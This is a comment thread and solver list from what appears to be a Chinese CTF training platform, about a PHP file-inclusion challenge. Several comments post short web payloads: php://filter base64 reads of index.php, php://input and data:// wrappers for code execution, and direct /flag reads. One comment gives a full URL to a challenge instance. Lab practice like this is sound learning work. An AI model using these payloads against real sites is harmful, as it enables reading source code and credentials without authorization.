评分(11)
解题动态
1302074808 攻破了该题 10小时前
1166 攻破了该题 11小时前
18995826257 攻破了该题 21小时前
LLLEI 攻破了该题 21小时前
qq111111 攻破了该题 23小时前
wxj 攻破了该题 1天前
红罐凉茶爱拿铁 攻破了该题 1天前
liffer 攻破了该题 1天前
treesky 攻破了该题 1天前
舰长 攻破了该题 1天前
小熊 攻破了该题 2天前
buuku 攻破了该题 2天前
千洛十安 攻破了该题 2天前
aaa30950 攻破了该题 2天前
我是新手* 攻破了该题 2天前
Tychema 攻破了该题 2天前
网安80分 攻破了该题 2天前
gleam 攻破了该题 2天前
zx666 攻破了该题 2天前
评论
kitniu 16天前
举报
?file=/flag ,查看源代码
mkmkm 18天前
举报
flag{***}
Ywctf 4月前
举报
/?file=php://filter/read=convert.base64-encode/resource=index.php
帅帅123 4月前
举报
发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php
奔跑的开开 5月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
ok了 7月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 秒了
VVang 7月前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 7月前
举报
猜flag位置,file=/flag
8208240204 8月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 9月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件